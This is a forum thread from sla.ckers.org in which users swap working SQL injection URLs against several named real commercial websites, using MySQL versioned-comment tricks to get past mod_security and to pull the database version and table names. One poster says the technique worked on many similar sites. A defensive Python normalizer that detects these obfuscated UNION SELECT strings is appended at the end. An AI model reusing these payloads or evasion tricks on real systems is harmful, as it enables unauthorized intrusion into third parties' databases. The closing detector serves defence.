Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
mod security block me again..
Posted by: kenjii
Date: November 25, 2013 09:34AM

Hi all, I can count the columns, but after that mod_security blocks me again...

With this syntax it seems to be OK but shows nothing...

http://pardumansinghjewellers.com/product_detail.php?id=-29%20/*!UNunionION*/%20/*!SELselectECT*/%201,2,3,4,5,6--


Something similar on this other link

http://www.earthquakesupplycenter.com/product_detail.php?id=68&subcatid=0&categoryid=-2+/*!UNunionION*/+/*!SELselectECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14--

and another one

http://vaultex.ae/viewProduct.php?parent=2&id=-134+union+select+1,2,3,4,5,6,7,8,9,10,11--



Edited 1 time(s). Last edit at 11/25/2013 03:27PM by kenjii.

Re: mod security block me again..
Posted by: ajkaro
Date: November 28, 2013 11:52AM

use /*!50000UnIoN*/ /*!50000SeLeCt*/

second link: there are 13 columns :)

Re: mod security block me again..
Posted by: kenjii
Date: November 29, 2013 01:14PM

Thanks very much, this helped me a lot with a lot of websites like this, thank you!

Re: mod security block me again..
Posted by: hack2012
Date: December 02, 2013 08:31PM

http://pardumansinghjewellers.com/product_detail.php?id=29 and 0/*!12345UNION*/ SELECT 1,2,@@version,4,5,6

5.5.28-29.1

http://pardumansinghjewellers.com/product_detail.php?id=29 and 0/*!12345UNION*//*!12345SELECT*/ 1,2,table_name,4,5,6 from /*!12345information_schema.tables*/ where table_schema=database() limit 0,1

Change 0,1 to 1,1 and you will find the difference.

Re: mod security block me again..
Posted by: ajkaro
Date: December 03, 2013 06:17PM

@hack2012

Why display one table at a time with LIMIT if you can show all 6 tables at once:

hXXp://parduman[slackers]singhjewellers.com/product_detail.php?id=29 and 0/*!50000UNION*/ SELECT 1,2,/*!50000GrouP_Concat(table_name, 0x3c62723e)*/,4,5,6 from /*!50000information_schema*/.tables where table_schema=database()-- -

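A defender-side check, added here as an example and not taken from any post in this thread: a normalizer that rewrites MySQL versioned comments (`/*!50000 ... */`) and ordinary comments the way the MySQL lexer effectively treats them, so that a UNION ... SELECT signature is matched on the normalized value instead of on the raw, comment-wrapped string that a literal filter misses. The sample values are the query strings quoted from the posts above with the hosts omitted; the first one (the `UNunionION` form) is not flagged, which is consistent with MySQL not executing it either, since the comment body is not the keyword.

```python
import re
from urllib.parse import unquote_plus

# Query strings quoted from the thread above (hosts omitted), plus one benign value.
SAMPLE_QUERIES = [
    "id=-29%20/*!UNunionION*/%20/*!SELselectECT*/%201,2,3,4,5,6--",
    "id=-134+union+select+1,2,3,4,5,6,7,8,9,10,11--",
    "id=29 and 0/*!12345UNION*/ SELECT 1,2,@@version,4,5,6",
    "id=29 and 0/*!50000UNION*/ SELECT 1,2,/*!50000GrouP_Concat(table_name, 0x3c62723e)*/,4,5,6 "
    "from /*!50000information_schema*/.tables where table_schema=database()-- -",
    "id=29",
]

# /*!NNNNN body*/ : MySQL executes `body` when its version is >= NNNNN (NNNNN optional).
VERSIONED_COMMENT = re.compile(r"/\*!\d{0,5}\s*(.*?)\*/", re.S)
# /* body */ : ordinary comment, ignored by MySQL.
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# Signature applied to the normalized value, case-insensitive, whole words only.
UNION_SELECT = re.compile(r"\bunion\b.*?\bselect\b", re.I | re.S)


def normalize_mysql(value: str) -> str:
    """Rewrite a parameter value roughly as the MySQL lexer sees it:
    URL-decode, unwrap versioned comments into plain whitespace-delimited
    text, drop ordinary comments, and collapse whitespace."""
    value = unquote_plus(value)
    value = VERSIONED_COMMENT.sub(r" \1 ", value)
    value = PLAIN_COMMENT.sub(" ", value)
    return re.sub(r"\s+", " ", value).strip()


def naive_match(value: str) -> bool:
    """A literal 'union select' check: the kind of filter the comment wrapping dodges."""
    return "union select" in unquote_plus(value).lower()


def flags_union_select(value: str) -> bool:
    """True when the normalized value contains a UNION ... SELECT sequence."""
    return UNION_SELECT.search(normalize_mysql(value)) is not None


def classify(queries):
    """(value, naive verdict, normalized verdict) for each sample, for a side-by-side view."""
    return [(q, naive_match(q), flags_union_select(q)) for q in queries]


if __name__ == "__main__":
    for value, naive, normalized in classify(SAMPLE_QUERIES):
        print(f"naive={naive!s:5} normalized={normalized!s:5} {value[:60]}")
```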